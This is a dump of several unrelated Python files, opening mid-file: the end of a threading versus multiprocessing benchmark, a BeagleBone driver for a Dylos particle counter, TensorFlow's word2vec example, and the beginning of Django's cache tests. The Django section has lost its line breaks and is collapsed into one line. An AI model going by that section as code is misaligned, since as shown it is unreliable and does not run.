    print(f"多线程计算密集型任务耗时:{end-start}秒")

    # CPU-bound task with processes (true parallelism across cores)
    print("启动多进程计算密集型任务")
    start = time.time()
    _start_and_join([multiprocessing.Process(target=task_cpu, args=(3000, ))
                     for _ in range(n_workers)])
    end = time.time()
    print(f"多进程计算密集型任务耗时:{end-start}秒")

    # I/O-bound task with threads (GIL released while sleeping)
    print("启动多线程IO密集型任务")
    start = time.time()
    _start_and_join([threading.Thread(target=task_io, args=(100, ))
                     for _ in range(n_workers)])
    end = time.time()
    print(f"多线程IO密集型任务耗时:{end-start}秒")

    # I/O-bound task with processes (pays process startup overhead)
    print("启动多进程IO密集型任务")
    start = time.time()
    _start_and_join([multiprocessing.Process(target=task_io, args=(100, ))
                     for _ in range(n_workers)])
    end = time.time()
    print(f"多进程IO密集型任务耗时:{end-start}秒")
dylos.py
import logging
from queue import Queue, Empty
import subprocess
from threading import Thread

import Adafruit_BBIO.GPIO as GPIO
import Adafruit_BBIO.UART as UART
import serial

# BeagleBone GPIO pin wired to the Dylos power/fan control.
DYLOS_POWER_PIN = "P8_10"
# Serial read timeout in seconds; also the unit used for the retry budget
# in Dylos._run (readline() returns b'' after this many seconds of silence).
TIMEOUT = 5

LOGGER = logging.getLogger(__name__)


def setup_sensor(config):
    """Factory entry point used by the sensor framework.

    NOTE(review): `config` is accepted but ignored — presumably for interface
    compatibility with other sensor modules; confirm against the caller.
    """
    return Dylos()


class Dylos:
    """Reader for a Dylos particle counter attached to a BeagleBone UART.

    A background thread (`start`/`_run`) continuously reads comma-separated
    "small,large" particle counts from the serial port into a queue;
    `read()` drains the queue and returns the averages.
    """

    def __init__(self, port='/dev/ttyO1', baudrate=9600, timeout=TIMEOUT):
        self.type = 'output'
        self.name = 'dylos'
        self.running = True
        self.queue = Queue()

        # Turn off LEDs
        # (disable the BeagleBone user-LED triggers; presumably to reduce
        # electrical noise or power draw — TODO confirm why)
        subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr0/trigger', shell=True)
        subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr1/trigger', shell=True)
        subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr2/trigger', shell=True)
        subprocess.call('echo none > /sys/class/leds/beaglebone\:green\:usr3/trigger', shell=True)

        # Setup UART
        UART.setup("UART1")
        self.ser = serial.Serial(port=port,
                                 baudrate=baudrate,
                                 parity=serial.PARITY_NONE,
                                 stopbits=serial.STOPBITS_ONE,
                                 bytesize=serial.EIGHTBITS,
                                 timeout=timeout)
        if not self.ser.isOpen():
            self.ser.open()

    def start(self):
        """Spawn the background serial-reader thread."""
        self.thread = Thread(target=self._run)
        self.thread.start()

    def _run(self):
        """Reader loop: parse "small,large" lines into the queue.

        If the port stays silent for more than ~60 seconds worth of read
        timeouts, assume the Dylos is powered off and drive the power pin
        low to turn it on.
        """
        retries = 0
        # Keep reading from serial port until we get some data
        while self.running:
            line = self.ser.readline()
            if not self.running:
                break
            if line == b'':
                # Empty read => readline() hit the TIMEOUT-second timeout.
                if retries > (60 / TIMEOUT) + 2:
                    # Dylos produces a data point every 60 seconds so something
                    # must be wrong. Try starting the Dylos fan.
                    LOGGER.debug("Dylos must be off, so turning it on")
                    GPIO.setup(DYLOS_POWER_PIN, GPIO.OUT)
                    GPIO.output(DYLOS_POWER_PIN, GPIO.LOW)
                    retries = 0
            else:
                try:
                    LOGGER.debug("Read from serial port: %s", line)
                    small, large = [int(x.strip()) for x in line.split(b',')]
                    LOGGER.debug("Small: %s, Large: %s", small, large)
                    self.queue.put((small, large))
                except ValueError:
                    # Malformed line (wrong field count / non-integer) — log
                    # and keep reading rather than killing the thread.
                    LOGGER.error("Unable to parse data from serial port: %s",
                                 line)
                # Any non-empty line resets the silence counter.
                retries = 0
            # NOTE(review): incremented on every iteration, including right
            # after a successful read (where it was just reset to 0) — the
            # counter therefore tracks consecutive empty reads plus one.
            retries += 1
        self.ser.close()

    def read(self):
        """Drain all queued (small, large) samples and return their averages.

        Returns a dict {"pm_small": int|None, "pm_large": int|None};
        both values are None when no samples arrived since the last call.
        """
        data = []
        try:
            while True:
                data.append(self.queue.get_nowait())
        except Empty:
            pass

        if len(data) == 0:
            return {"pm_small": None, "pm_large": None}

        smalls, larges = zip(*data)
        avg_small = sum(smalls) / len(smalls)
        avg_large = sum(larges) / len(larges)
        return {"pm_small": int(round(avg_small)),
                "pm_large": int(round(avg_large))}

    def stop(self):
        """Signal the reader loop to exit and wait for the thread to finish."""
        self.running = False
        self.thread.join()
word2vec_tf.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec mini-batched skip-gram model.

Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does traditional minibatching.

The key ops used are:
* placeholder for feeding in tensors for each example.
* embedding_lookup for fetching rows from the embedding matrix.
* sigmoid_cross_entropy_with_logits to calculate the loss.
* GradientDescentOptimizer for optimizing the loss.
* skipgram custom op that does input processing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import os
import sys
import threading
import time

from six.moves import xrange  # pylint: disable=redefined-builtin

import numpy as np
import tensorflow as tf

# Custom skipgram input op; the compiled .so must sit next to this file.
word2vec = tf.load_op_library(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'word2vec_ops.so'))

flags = tf.app.flags

flags.DEFINE_string("save_path", None, "Directory to write the model and "
                    "training summaries.")
flags.DEFINE_string("train_data", None, "Training text file. "
                    "E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
    "eval_data", None, "File consisting of analogies of four tokens."
    "embedding 2 - embedding 1 + embedding 3 should be close "
    "to embedding 4."
    "See README.md for how to get 'questions-words.txt'.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
    "epochs_to_train", 15,
    "Number of epochs to train. Each epoch processes the training data once "
    "completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 100,
                     "Negative samples per training example.")
flags.DEFINE_integer("batch_size", 16,
                     "Number of training examples processed per step "
                     "(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
                     "The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
                     "The number of words to predict to the left and right "
                     "of the target word.")
flags.DEFINE_integer("min_count", 5,
                     "The minimum number of word occurrences for it to be "
                     "included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
                   "Subsample threshold for word occurrence. Words that appear "
                   "with higher frequency will be randomly down-sampled. Set "
                   "to 0 to disable.")
flags.DEFINE_boolean(
    "interactive", False,
    "If true, enters an IPython interactive session to play with the trained "
    "model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
    "model.nearby([b'proton', b'elephant', b'maxwell'])")
flags.DEFINE_integer("statistics_interval", 5,
                     "Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
                     "Save training summary to file every n seconds (rounded "
                     "up to statistics interval).")
flags.DEFINE_integer("checkpoint_interval", 600,
                     "Checkpoint the model (i.e. save the parameters) every n "
                     "seconds (rounded up to statistics interval).")

FLAGS = flags.FLAGS


class Options(object):
  """Options used by our word2vec model."""

  def __init__(self):
    """Snapshot all FLAGS values into plain attributes.

    Also creates save_path on disk if it does not exist yet.
    """
    # Model options.

    # Embedding dimension.
    self.emb_dim = FLAGS.embedding_size

    # Training options.

    # The training text file.
    self.train_data = FLAGS.train_data

    # Number of negative samples per example.
    self.num_samples = FLAGS.num_neg_samples

    # The initial learning rate.
    self.learning_rate = FLAGS.learning_rate

    # Number of epochs to train. After these many epochs, the learning
    # rate decays linearly to zero and the training stops.
    self.epochs_to_train = FLAGS.epochs_to_train

    # Concurrent training steps.
    self.concurrent_steps = FLAGS.concurrent_steps

    # Number of examples for one training step.
    self.batch_size = FLAGS.batch_size

    # The number of words to predict to the left and right of the target word.
    self.window_size = FLAGS.window_size

    # The minimum number of word occurrences for it to be included in the
    # vocabulary.
    self.min_count = FLAGS.min_count

    # Subsampling threshold for word occurrence.
    self.subsample = FLAGS.subsample

    # How often to print statistics.
    self.statistics_interval = FLAGS.statistics_interval

    # How often to write to the summary file (rounds up to the nearest
    # statistics_interval).
    self.summary_interval = FLAGS.summary_interval

    # How often to write checkpoints (rounds up to the nearest statistics
    # interval).
    self.checkpoint_interval = FLAGS.checkpoint_interval

    # Where to write out summaries.
    self.save_path = FLAGS.save_path
    if not os.path.exists(self.save_path):
      os.makedirs(self.save_path)

    # Eval options.

    # The text file for eval.
    self.eval_data = FLAGS.eval_data


class Word2Vec(object):
  """Word2Vec model (Skipgram)."""

  def __init__(self, options, session):
    """Build the training and eval graphs and write the vocabulary file.

    Args:
      options: an Options instance (vocab_* fields are filled in by
        build_graph as a side effect).
      session: the tf.Session used for all graph execution.
    """
    self._options = options
    self._session = session
    self._word2id = {}
    self._id2word = []
    self.build_graph()
    self.build_eval_graph()
    self.save_vocab()

  def read_analogies(self):
    """Reads through the analogy question file.

    Returns:
      questions: a [n, 4] numpy array containing the analogy question's
                 word ids.
      questions_skipped: questions skipped due to unknown words.
    """
    questions = []
    questions_skipped = 0
    with open(self._options.eval_data, "rb") as analogy_f:
      for line in analogy_f:
        if line.startswith(b":"):  # Skip comments.
          continue
        words = line.strip().lower().split(b" ")
        # get() returns None for out-of-vocabulary words.
        ids = [self._word2id.get(w.strip()) for w in words]
        if None in ids or len(ids) != 4:
          questions_skipped += 1
        else:
          questions.append(np.array(ids))
    print("Eval analogy file: ", self._options.eval_data)
    print("Questions: ", len(questions))
    print("Skipped: ", questions_skipped)
    self._analogy_questions = np.array(questions, dtype=np.int32)

  def forward(self, examples, labels):
    """Build the graph for the forward pass."""
    opts = self._options

    # Declare all variables we need.
    # Embedding: [vocab_size, emb_dim]
    init_width = 0.5 / opts.emb_dim
    emb = tf.Variable(
        tf.random_uniform(
            [opts.vocab_size, opts.emb_dim], -init_width, init_width),
        name="emb")
    self._emb = emb

    # Softmax weight: [vocab_size, emb_dim]. Transposed.
    sm_w_t = tf.Variable(
        tf.zeros([opts.vocab_size, opts.emb_dim]),
        name="sm_w_t")

    # Softmax bias: [vocab_size].
    sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b")

    # Global step: scalar, i.e., shape [].
    self.global_step = tf.Variable(0, name="global_step")

    # Nodes to compute the nce loss w/ candidate sampling.
    labels_matrix = tf.reshape(
        tf.cast(labels,
                dtype=tf.int64),
        [opts.batch_size, 1])

    # Negative sampling.
    sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
        true_classes=labels_matrix,
        num_true=1,
        num_sampled=opts.num_samples,
        unique=True,
        range_max=opts.vocab_size,
        distortion=0.75,
        unigrams=opts.vocab_counts.tolist()))

    # Embeddings for examples: [batch_size, emb_dim]
    example_emb = tf.nn.embedding_lookup(emb, examples)

    # Weights for labels: [batch_size, emb_dim]
    true_w = tf.nn.embedding_lookup(sm_w_t, labels)
    # Biases for labels: [batch_size, 1]
    true_b = tf.nn.embedding_lookup(sm_b, labels)

    # Weights for sampled ids: [num_sampled, emb_dim]
    sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids)
    # Biases for sampled ids: [num_sampled, 1]
    sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids)

    # True logits: [batch_size, 1]
    true_logits = tf.reduce_sum(tf.multiply(example_emb, true_w), 1) + true_b

    # Sampled logits: [batch_size, num_sampled]
    # We replicate sampled noise labels for all examples in the batch
    # using the matmul.
    sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples])
    sampled_logits = tf.matmul(example_emb,
                               sampled_w,
                               transpose_b=True) + sampled_b_vec
    return true_logits, sampled_logits

  def nce_loss(self, true_logits, sampled_logits):
    """Build the graph for the NCE loss."""

    # cross-entropy(logits, labels)
    opts = self._options
    true_xent = tf.nn.sigmoid_cross_entropy_with_logits(
        labels=tf.ones_like(true_logits), logits=true_logits)
    sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits(
        labels=tf.zeros_like(sampled_logits), logits=sampled_logits)

    # NCE-loss is the sum of the true and noise (sampled words)
    # contributions, averaged over the batch.
    nce_loss_tensor = (tf.reduce_sum(true_xent) +
                       tf.reduce_sum(sampled_xent)) / opts.batch_size
    return nce_loss_tensor

  def optimize(self, loss):
    """Build the graph to optimize the loss function."""

    # Optimizer nodes.
    # Linear learning rate decay.
    opts = self._options
    words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
    # Decays toward 0 as training progresses; floored at 0.0001 of the base.
    lr = opts.learning_rate * tf.maximum(
        0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
    self._lr = lr
    optimizer = tf.train.GradientDescentOptimizer(lr)
    # GATE_NONE: lock-free (Hogwild-style) updates across the worker threads.
    train = optimizer.minimize(loss,
                               global_step=self.global_step,
                               gate_gradients=optimizer.GATE_NONE)
    self._train = train

  def build_eval_graph(self):
    """Build the eval graph."""
    # Eval graph

    # Each analogy task is to predict the 4th word (d) given three
    # words: a, b, c.  E.g., a=italy, b=rome, c=france, we should
    # predict d=paris.

    # The eval feeds three vectors of word ids for a, b, c, each of
    # which is of size N, where N is the number of analogies we want to
    # evaluate in one batch.
    analogy_a = tf.placeholder(dtype=tf.int32)  # [N]
    analogy_b = tf.placeholder(dtype=tf.int32)  # [N]
    analogy_c = tf.placeholder(dtype=tf.int32)  # [N]

    # Normalized word embeddings of shape [vocab_size, emb_dim].
    nemb = tf.nn.l2_normalize(self._emb, 1)

    # Each row of a_emb, b_emb, c_emb is a word's embedding vector.
    # They all have the shape [N, emb_dim]
    a_emb = tf.gather(nemb, analogy_a)  # a's embs
    b_emb = tf.gather(nemb, analogy_b)  # b's embs
    c_emb = tf.gather(nemb, analogy_c)  # c's embs

    # We expect that d's embedding vectors on the unit hyper-sphere is
    # near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
    target = c_emb + (b_emb - a_emb)

    # Compute cosine distance between each pair of target and vocab.
    # dist has shape [N, vocab_size].
    dist = tf.matmul(target, nemb, transpose_b=True)

    # For each question (row in dist), find the top 4 words.
    _, pred_idx = tf.nn.top_k(dist, 4)

    # Nodes for computing neighbors for a given word according to
    # their cosine distance.
    nearby_word = tf.placeholder(dtype=tf.int32)  # word id
    nearby_emb = tf.gather(nemb, nearby_word)
    nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
    nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
                                         min(1000, self._options.vocab_size))

    # Nodes in the construct graph which are used by training and
    # evaluation to run/feed/fetch.
    self._analogy_a = analogy_a
    self._analogy_b = analogy_b
    self._analogy_c = analogy_c
    self._analogy_pred_idx = pred_idx
    self._nearby_word = nearby_word
    self._nearby_val = nearby_val
    self._nearby_idx = nearby_idx

  def build_graph(self):
    """Build the graph for the full model."""
    opts = self._options
    # The training data. A text file.
    # The custom op both builds the vocabulary and yields (example, label)
    # minibatches; _epoch and _words are counters it maintains.
    (words, counts, words_per_epoch, self._epoch, self._words, examples,
     labels) = word2vec.skipgram_word2vec(filename=opts.train_data,
                                          batch_size=opts.batch_size,
                                          window_size=opts.window_size,
                                          min_count=opts.min_count,
                                          subsample=opts.subsample)
    (opts.vocab_words, opts.vocab_counts,
     opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
    opts.vocab_size = len(opts.vocab_words)
    print("Data file: ", opts.train_data)
    print("Vocab size: ", opts.vocab_size - 1, " + UNK")
    print("Words per epoch: ", opts.words_per_epoch)
    self._examples = examples
    self._labels = labels
    self._id2word = opts.vocab_words
    for i, w in enumerate(self._id2word):
      self._word2id[w] = i
    true_logits, sampled_logits = self.forward(examples, labels)
    loss = self.nce_loss(true_logits, sampled_logits)
    tf.summary.scalar("NCE loss", loss)
    self._loss = loss
    self.optimize(loss)

    # Properly initialize all variables.
    tf.global_variables_initializer().run()

    self.saver = tf.train.Saver()

  def save_vocab(self):
    """Save the vocabulary to a file so the model can be reloaded."""
    opts = self._options
    with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
      for i in xrange(opts.vocab_size):
        # NOTE(review): encode() yields bytes, and "%s" % bytes writes the
        # b'...' repr into this text file under Python 3; the intent was
        # presumably to write the decoded word — confirm before changing.
        vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
        f.write("%s %d\n" % (vocab_word,
                             opts.vocab_counts[i]))

  def _train_thread_body(self):
    """Worker loop: keep running train steps until the epoch counter advances."""
    initial_epoch, = self._session.run([self._epoch])
    while True:
      _, epoch = self._session.run([self._train, self._epoch])
      if epoch != initial_epoch:
        break

  def train(self):
    """Train the model.

    Spawns concurrent_steps worker threads for one epoch, while this thread
    periodically prints statistics and writes summaries/checkpoints.
    Returns the epoch counter value after the epoch completes.
    """
    opts = self._options

    initial_epoch, initial_words = self._session.run([self._epoch, self._words])

    summary_op = tf.summary.merge_all()
    summary_writer = tf.summary.FileWriter(opts.save_path, self._session.graph)
    workers = []
    for _ in xrange(opts.concurrent_steps):
      t = threading.Thread(target=self._train_thread_body)
      t.start()
      workers.append(t)

    last_words, last_time, last_summary_time = initial_words, time.time(), 0
    last_checkpoint_time = 0
    while True:
      time.sleep(opts.statistics_interval)  # Reports our progress once a while.
      (epoch, step, loss, words, lr) = self._session.run(
          [self._epoch, self.global_step, self._loss, self._words, self._lr])
      now = time.time()
      last_words, last_time, rate = words, now, (words - last_words) / (
          now - last_time)
      print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" %
            (epoch, step, lr, loss, rate),
            end="")
      sys.stdout.flush()
      if now - last_summary_time > opts.summary_interval:
        summary_str = self._session.run(summary_op)
        summary_writer.add_summary(summary_str, step)
        last_summary_time = now
      if now - last_checkpoint_time > opts.checkpoint_interval:
        self.saver.save(self._session,
                        os.path.join(opts.save_path, "model.ckpt"),
                        global_step=step.astype(int))
        last_checkpoint_time = now
      if epoch != initial_epoch:
        break

    for t in workers:
      t.join()

    return epoch

  def _predict(self, analogy):
    """Predict the top 4 answers for analogy questions."""
    idx, = self._session.run([self._analogy_pred_idx], {
        self._analogy_a: analogy[:, 0],
        self._analogy_b: analogy[:, 1],
        self._analogy_c: analogy[:, 2]
    })
    return idx

  def eval(self):
    """Evaluate analogy questions and reports accuracy."""

    # How many questions we get right at precision@1.
    correct = 0

    try:
      total = self._analogy_questions.shape[0]
    except AttributeError as e:
      # NOTE(review): `e` is unused; consider `raise ... from e` to preserve
      # the exception chain.
      raise AttributeError("Need to read analogy questions.")

    start = 0
    while start < total:
      limit = start + 2500
      sub = self._analogy_questions[start:limit, :]
      idx = self._predict(sub)
      start = limit
      for question in xrange(sub.shape[0]):
        for j in xrange(4):
          if idx[question, j] == sub[question, 3]:
            # Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
            correct += 1
            break
          elif idx[question, j] in sub[question, :3]:
            # We need to skip words already in the question.
            continue
          else:
            # The correct label is not the precision@1
            break
    print()
    print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
                                              correct * 100.0 / total))

  def analogy(self, w0, w1, w2):
    """Predict word w3 as in w0:w1 vs w2:w3."""
    # Unknown words map to id 0 (UNK).
    wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
    idx = self._predict(wid)
    for c in [self._id2word[i] for i in idx[0, :]]:
      if c not in [w0, w1, w2]:
        print(c)
        return
    print("unknown")

  def nearby(self, words, num=20):
    """Prints out nearby words given a list of words."""
    ids = np.array([self._word2id.get(x, 0) for x in words])
    vals, idx = self._session.run(
        [self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
    for i in xrange(len(words)):
      print("\n%s\n=====================================" % (words[i]))
      for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
        print("%-20s %6.4f" % (self._id2word[neighbor], distance))


def _start_shell(local_ns=None):
  # An interactive shell is useful for debugging/development.
  import IPython
  user_ns = {}
  if local_ns:
    user_ns.update(local_ns)
  user_ns.update(globals())
  IPython.start_ipython(argv=[], user_ns=user_ns)


def main(_):
  """Train a word2vec model."""
  if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
    print("--train_data --eval_data and --save_path must be specified.")
    sys.exit(1)
  opts = Options()
  with tf.Graph().as_default(), tf.Session() as session:
    with tf.device("/cpu:0"):
      model = Word2Vec(opts, session)
      model.read_analogies()  # Read analogy questions
    for _ in xrange(opts.epochs_to_train):
      model.train()  # Process one epoch
      model.eval()  # Eval analogies.
    # Perform a final save.
    model.saver.save(session,
                     os.path.join(opts.save_path, "model.ckpt"),
                     global_step=model.global_step)
    if FLAGS.interactive:
      # E.g.,
      # [0]: model.analogy(b'france', b'paris', b'russia')
      # [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
      _start_shell(locals())


if __name__ == "__main__":
  tf.app.run()
tests.py
# Unit tests for cache framework # Uses whatever cache backend is set in the test settings file. import copy import io import os import pickle import re import shutil import tempfile import threading import time import unittest import warnings from unittest import mock from django.conf import settings from django.core import management, signals from django.core.cache import ( DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches, ) from django.core.cache.utils import make_template_fragment_key from django.db import close_old_connections, connection, connections from django.http import ( HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse, ) from django.middleware.cache import ( CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware, ) from django.middleware.csrf import CsrfViewMiddleware from django.template import engines from django.template.context_processors import csrf from django.template.response import TemplateResponse from django.test import ( RequestFactory, SimpleTestCase, TestCase, TransactionTestCase, override_settings, ) from django.test.signals import setting_changed from django.utils import timezone, translation from django.utils.cache import ( get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers, ) from django.views.decorators.cache import cache_control, cache_page from .models import Poll, expensive_calculation # functions/classes for complex data type tests def f(): return 42 class C: def m(n): return 24 class Unpicklable: def __getstate__(self): raise pickle.PickleError() KEY_ERRORS_WITH_MEMCACHED_MSG = ( 'Cache key contains characters that will cause errors if used with ' 'memcached: %r' ) @override_settings(CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.dummy.DummyCache', } }) class DummyCacheTests(SimpleTestCase): # The Dummy cache backend doesn't really behave like a test backend, # so it has its own test case. 
def test_simple(self): "Dummy cache backend ignores cache set calls" cache.set("key", "value") self.assertIsNone(cache.get("key")) def test_add(self): "Add doesn't do anything in dummy cache backend" cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertTrue(result) self.assertIsNone(cache.get("addkey1")) def test_non_existent(self): "Nonexistent keys aren't found in the dummy cache backend" self.assertIsNone(cache.get("does_not_exist")) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): "get_many returns nothing for the dummy cache backend" cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {}) def test_get_many_invalid_key(self): with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'): cache.get_many(['key with spaces']) def test_delete(self): "Cache deletion is transparently ignored on the dummy cache backend" cache.set("key1", "spam") cache.set("key2", "eggs") self.assertIsNone(cache.get("key1")) cache.delete("key1") self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) def test_has_key(self): "The has_key method doesn't ever return True for the dummy cache backend" cache.set("hello1", "goodbye1") self.assertFalse(cache.has_key("hello1")) self.assertFalse(cache.has_key("goodbye1")) def test_in(self): "The in operator doesn't ever return True for the dummy cache backend" cache.set("hello2", "goodbye2") self.assertNotIn("hello2", cache) self.assertNotIn("goodbye2", cache) def test_incr(self): "Dummy cache values can't be incremented" cache.set('answer', 42) with self.assertRaises(ValueError): cache.incr('answer') with self.assertRaises(ValueError): cache.incr('does_not_exist') def test_decr(self): "Dummy cache values can't be decremented" cache.set('answer', 42) with self.assertRaises(ValueError): 
cache.decr('answer') with self.assertRaises(ValueError): cache.decr('does_not_exist') def test_data_types(self): "All data types are ignored equally by the dummy cache" stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertIsNone(cache.get("stuff")) def test_expiration(self): "Expiration has no effect on the dummy cache" cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertIsNone(cache.get("expire1")) cache.add("expire2", "newvalue") self.assertIsNone(cache.get("expire2")) self.assertFalse(cache.has_key("expire3")) def test_unicode(self): "Unicode values are ignored by the dummy cache" stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } for (key, value) in stuff.items(): with self.subTest(key=key): cache.set(key, value) self.assertIsNone(cache.get(key)) def test_set_many(self): "set_many does nothing for the dummy cache backend" self.assertEqual(cache.set_many({'a': 1, 'b': 2}), []) self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), []) def test_set_many_invalid_key(self): with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'): cache.set_many({'key with spaces': 'foo'}) def test_delete_many(self): "delete_many does nothing for the dummy cache backend" cache.delete_many(['a', 'b']) def test_delete_many_invalid_key(self): with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'): cache.delete_many({'key with spaces': 'foo'}) def test_clear(self): "clear does nothing for the dummy cache backend" cache.clear() def test_incr_version(self): "Dummy cache versions can't be incremented" cache.set('answer', 42) with self.assertRaises(ValueError): 
cache.incr_version('answer') with self.assertRaises(ValueError): cache.incr_version('does_not_exist') def test_decr_version(self): "Dummy cache versions can't be decremented" cache.set('answer', 42) with self.assertRaises(ValueError): cache.decr_version('answer') with self.assertRaises(ValueError): cache.decr_version('does_not_exist') def test_get_or_set(self): self.assertEqual(cache.get_or_set('mykey', 'default'), 'default') self.assertEqual(cache.get_or_set('mykey', None), None) def test_get_or_set_callable(self): def my_callable(): return 'default' self.assertEqual(cache.get_or_set('mykey', my_callable), 'default') self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default') def custom_key_func(key, key_prefix, version): "A customized cache key function" return 'CUSTOM-' + '-'.join([key_prefix, str(version), key]) _caches_setting_base = { 'default': {}, 'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())}, 'v2': {'VERSION': 2}, 'custom_key': {'KEY_FUNCTION': custom_key_func}, 'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'}, 'cull': {'OPTIONS': {'MAX_ENTRIES': 30}}, 'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}}, } def caches_setting_for_tests(base=None, exclude=None, **params): # `base` is used to pull in the memcached config from the original settings, # `exclude` is a set of cache names denoting which `_caches_setting_base` keys # should be omitted. # `params` are test specific overrides and `_caches_settings_base` is the # base config for the tests. 
# This results in the following search order: # params -> _caches_setting_base -> base base = base or {} exclude = exclude or set() setting = {k: base.copy() for k in _caches_setting_base if k not in exclude} for key, cache_params in setting.items(): cache_params.update(_caches_setting_base[key]) cache_params.update(params) return setting class BaseCacheTests: # A common set of tests to apply to all cache backends def setUp(self): self.factory = RequestFactory() def tearDown(self): cache.clear() def test_simple(self): # Simple cache set/get works cache.set("key", "value") self.assertEqual(cache.get("key"), "value") def test_add(self): # A key can be added to a cache cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertFalse(result) self.assertEqual(cache.get("addkey1"), "value") def test_prefix(self): # Test for same cache key conflicts between shared backend cache.set('somekey', 'value') # should not be set in the prefixed cache self.assertFalse(caches['prefix'].has_key('somekey')) caches['prefix'].set('somekey', 'value2') self.assertEqual(cache.get('somekey'), 'value') self.assertEqual(caches['prefix'].get('somekey'), 'value2') def test_non_existent(self): """Nonexistent cache keys return as None/default.""" self.assertIsNone(cache.get("does_not_exist")) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): # Multiple cache keys can be returned using get_many cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'}) def test_delete(self): # Cache keys can be deleted cache.set("key1", "spam") cache.set("key2", "eggs") self.assertEqual(cache.get("key1"), "spam") cache.delete("key1") self.assertIsNone(cache.get("key1")) self.assertEqual(cache.get("key2"), "eggs") def test_has_key(self): # The cache can be inspected for cache keys 
